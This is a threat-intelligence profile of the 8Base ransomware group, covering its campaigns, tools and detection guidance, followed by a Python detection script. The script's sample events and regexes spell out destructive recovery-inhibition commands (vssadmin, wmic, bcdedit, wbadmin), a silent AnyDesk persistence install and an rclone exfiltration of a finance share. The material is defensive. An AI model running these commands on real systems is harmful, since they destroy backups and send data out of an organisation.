blacktemple.net, Cybersecurity News & Analysis (github: defconxt), © 2026
8Base

Also known as: 8Base Ransomware
Type: ransomware
Nation: Unknown
Active since: 2022
Targets: SMB, Manufacturing, Professional Services, Finance, Construction, Healthcare
Known tools: Phobos Ransomware, SmokeLoader, SystemBC, Cobalt Strike, Mimikatz, AnyDesk, RClone
MITRE ATT&CK: T1566.001, T1078, T1190, T1486, T1489, T1083, T1021.001, T1071.001, T1560, T1485
References: MITRE ATT&CK, VMware Carbon Black Threat Analysis, Cisco Talos 8Base Analysis, Trend Micro 8Base Report

Background

8Base is a ransomware and data extortion group that emerged publicly in 2022 but significantly escalated operations in mid-2023, briefly becoming one of the most active ransomware operations by victim count. The group targets small and medium-sized businesses (SMBs) across a wide range of sectors, with a particular concentration in manufacturing, professional services, and finance.

The group primarily deploys a customized variant of Phobos ransomware, a widely available ransomware-as-a-service platform, alongside SmokeLoader for initial access. This reliance on commodity malware suggests 8Base may operate as a sophisticated affiliate group rather than a developer. Despite using off-the-shelf tools, the group's operational tempo is notable: in June 2023, 8Base listed more victims on their data leak site than any other ransomware group, including established operations like LockBit and Cl0p.

The group's name and branding carry no clear ideological meaning, and the actors behind 8Base remain unattributed. Victimology is geographically broad, with the United States, Brazil, the United Kingdom, Germany, and France the most frequently targeted countries. The group publishes stolen data on a Tor-hosted leak site and threatens victims with public exposure if ransom demands are not met.

Notable Campaigns

SMB Surge (June-July 2023): During a two-month period, 8Base claimed responsibility for breaches at more than 35 organizations, making it the most active ransomware group by claimed victim count for that period. Most victims were small to mid-sized businesses with fewer than 500 employees, consistent with the group's targeting of organizations with limited security capabilities.

Professional Services Targeting: Throughout 2023-2024, 8Base consistently targeted accounting firms, law offices, and consulting companies, likely attracted by the sensitive client data held by these organizations and the reputational pressure to quietly resolve ransomware incidents rather than disclose them publicly.

Latin American Campaign (2023-2024): 8Base showed unusually high activity against Brazilian and other Latin American organizations relative to other ransomware groups, suggesting possible linguistic or regional familiarity among the threat actors. Brazil ranked second only to the United States in 8Base victim counts during this period.

Healthcare Sector Attacks (2024): Despite emerging rhetoric from some ransomware groups about avoiding healthcare targets, 8Base continued attacking hospitals and medical providers, exfiltrating patient data and disrupting clinical operations to maximize extortion pressure.

Tactics, Techniques & Procedures

8Base gains initial access primarily through phishing campaigns (T1566.001) delivering SmokeLoader, which then retrieves additional payloads. The group also logs in to exposed RDP services with weak, default, or reused credentials (T1078) and exploits unpatched internet-facing applications (T1190), consistent with broad SMB targeting where administrative interfaces are often left internet-accessible.

After establishing a foothold, 8Base operators use legitimate remote access tools including AnyDesk for persistent access and command execution. The group conducts network reconnaissance, harvests credentials with Mimikatz, and moves laterally via RDP (T1021.001). Data is staged and exfiltrated using RClone to cloud storage services before ransomware deployment.

The Phobos variant used by 8Base encrypts files (T1486) and appends a custom extension. Before encryption the group deletes volume shadow copies and the Windows backup catalog so that recovery without paying is not possible (Inhibit System Recovery, T1490). Ransom notes direct victims to a Tor-based negotiation portal with a 72-hour initial deadline.

Tools & Malware

  • Phobos Ransomware: Commodity ransomware-as-a-service platform, customized with 8Base branding. Encrypts local and network files with AES-256.
  • SmokeLoader: Modular malware loader used for initial access and subsequent payload delivery; often distributed via phishing email attachments.
  • SystemBC: SOCKS5 proxy used as a C2 relay to anonymize communications.
  • Cobalt Strike: Commercial post-exploitation framework used for lateral movement and payload staging.
  • Mimikatz: Credential harvesting tool for extracting passwords and hashes from Windows memory.
  • AnyDesk: Legitimate remote desktop software abused for persistent interactive access to compromised systems.
  • RClone: Open-source cloud synchronization tool used to exfiltrate data to remote cloud storage prior to encryption.

Indicators & Detection

8Base relies heavily on SmokeLoader for initial delivery, so email security controls blocking malicious Office document attachments and LNK files are primary preventive measures. Endpoint detection should flag SmokeLoader's characteristic process injection patterns and its use of legitimate Windows processes for code execution.

Monitor for AnyDesk installation or execution on servers and workstations where remote access software is not standard; 8Base operators deploy it via batch scripts or push it through Group Policy to establish persistent access, so an unattended install on a file server is as significant as an interactive launch on a workstation. Alert on RClone execution on any system where it is not an approved backup or synchronisation tool, since it is strongly associated with data exfiltration. Operators commonly rename the binary, so match on the PE original file name recorded in process-creation telemetry, or on its command-line shape (a copy/sync/move sub-command whose destination is a remote:path token), rather than on the image name alone.

Pre-encryption indicators include the recovery-inhibition commands Phobos issues just before encrypting (vssadmin delete shadows, wmic shadowcopy delete, bcdedit changes that disable Windows recovery, and wbadmin delete catalog), rapid file access across many directories, and connections to Tor infrastructure or known Phobos C2 endpoints. Implement network segmentation to limit lateral RDP movement and enforce MFA on all remote access services to raise the cost of the group's credential-based access methods.
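A worked detection pass over the three indicator families above (recovery inhibition, renamed RClone, unexpected AnyDesk), written as an added example for this profile; it is not code from the page's references or from any vendor. The events are constructed records shaped like Sysmon Event ID 1 fields, and the hostnames, users, paths and the two allowlists are hypothetical. It goes one step beyond the text by correlating per host, flagging machines that show both exfiltration tooling and recovery inhibition, the exfil-then-encrypt sequence the TTP section describes.

```python
"""Detect 8Base pre-encryption tradecraft in process-creation telemetry.

Added example for this profile, not code from the page or its references.
SAMPLE_EVENTS are constructed records shaped like Sysmon Event ID 1 fields;
the hostnames, users, paths and allowlists below are hypothetical.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

# Hypothetical allowlists: hosts where remote-access / sync tooling is sanctioned.
ANYDESK_ALLOWED_HOSTS = {"helpdesk-ws01"}
RCLONE_ALLOWED_HOSTS = {"bkp-srv01"}

# Recovery-inhibition commands issued by Phobos-family ransomware (ATT&CK T1490).
RECOVERY_INHIBIT = [
    (re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I), "vssadmin delete shadows"),
    (re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I), "wmic shadowcopy delete"),
    (re.compile(r"bcdedit(\.exe)?.*\brecoveryenabled\s+no\b", re.I), "bcdedit recoveryenabled no"),
    (re.compile(r"bcdedit(\.exe)?.*\bbootstatuspolicy\s+ignoreallfailures\b", re.I),
     "bcdedit bootstatuspolicy ignoreallfailures"),
    (re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I), "wbadmin delete catalog"),
]

# rclone is routinely renamed, so besides the image name we match the PE
# OriginalFileName that Sysmon records and the command shape: a sub-command
# followed by a "remote:path" token. Two or more characters before the colon
# keep drive letters (C:) from matching; (?!//) keeps URLs from matching.
RCLONE_CMD = re.compile(r"\b(copy|sync|move)\b.*?(?:^|\s)[A-Za-z][A-Za-z0-9_-]+:(?!//)", re.I)


@dataclass(frozen=True)
class Alert:
    host: str
    rule: str
    detail: str


def detect(event: Dict[str, str]) -> List[Alert]:
    """Apply the three detections to a single process-creation event."""
    host = event["host"]
    image = event["image"].lower().rsplit("\\", 1)[-1]
    cmd = event.get("command_line", "")
    orig = event.get("original_file_name", "").lower()
    alerts: List[Alert] = []

    for pattern, label in RECOVERY_INHIBIT:
        if pattern.search(cmd):
            alerts.append(Alert(host, "recovery_inhibit", label))

    looks_like_rclone = image == "rclone.exe" or orig == "rclone.exe" or bool(RCLONE_CMD.search(cmd))
    if looks_like_rclone and host not in RCLONE_ALLOWED_HOSTS:
        alerts.append(Alert(host, "rclone_exfil", cmd or event["image"]))

    if (image.startswith("anydesk") or orig.startswith("anydesk")) and host not in ANYDESK_ALLOWED_HOSTS:
        alerts.append(Alert(host, "anydesk_unexpected", event["image"]))
    return alerts


def scan(events: Iterable[Dict[str, str]]) -> List[Alert]:
    return [alert for event in events for alert in detect(event)]


def high_priority_hosts(alerts: Iterable[Alert]) -> List[str]:
    """Hosts showing both staging/exfiltration tooling and recovery inhibition."""
    rules: Dict[str, Set[str]] = {}
    for alert in alerts:
        rules.setdefault(alert.host, set()).add(alert.rule)
    return sorted(h for h, r in rules.items() if {"rclone_exfil", "recovery_inhibit"} <= r)


# Constructed sample telemetry (hypothetical hosts, users and paths).
SAMPLE_EVENTS = [
    {"host": "fin-ws07", "user": "CORP\\jsmith", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & "
                     r"bcdedit /set {default} bootstatuspolicy ignoreallfailures & "
                     r"bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet"},
    # rclone renamed to svchost.exe; only OriginalFileName and the command shape give it away.
    {"host": "fin-ws07", "user": "CORP\\jsmith", "image": r"C:\Users\Public\svchost.exe",
     "original_file_name": "rclone.exe",
     "command_line": r"svchost.exe copy C:\Shares\Finance mega:dump/fin --transfers 8 -q"},
    {"host": "helpdesk-ws01", "user": "CORP\\itadmin", "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "command_line": r'"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service'},
    {"host": "srv-files01", "user": "NT AUTHORITY\\SYSTEM", "image": r"C:\ProgramData\AnyDesk\AnyDesk.exe",
     "command_line": r"AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"},
    {"host": "bkp-srv01", "user": "CORP\\svc_backup", "image": r"C:\Tools\rclone\rclone.exe",
     "original_file_name": "rclone.exe",
     "command_line": r"rclone.exe sync D:\Backups offsite:corp-backups --bwlimit 10M"},
    {"host": "dev-ws03", "user": "CORP\\ahale", "image": r"C:\Windows\System32\robocopy.exe",
     "command_line": r"robocopy C:\src D:\build /MIR"},
]

if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for alert in found:
        print(f"{alert.host:14} {alert.rule:20} {alert.detail}")
    print("high priority:", high_priority_hosts(found))
```

On the sample data the sanctioned AnyDesk helpdesk host, the backup server's approved rclone job and the robocopy run produce nothing, while the finance workstation raises five recovery-inhibition alerts plus the renamed-rclone alert and is the only host returned by high_priority_hosts. In production the allowlists would come from asset inventory, and the correlation window would be bounded in time rather than across the whole input.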
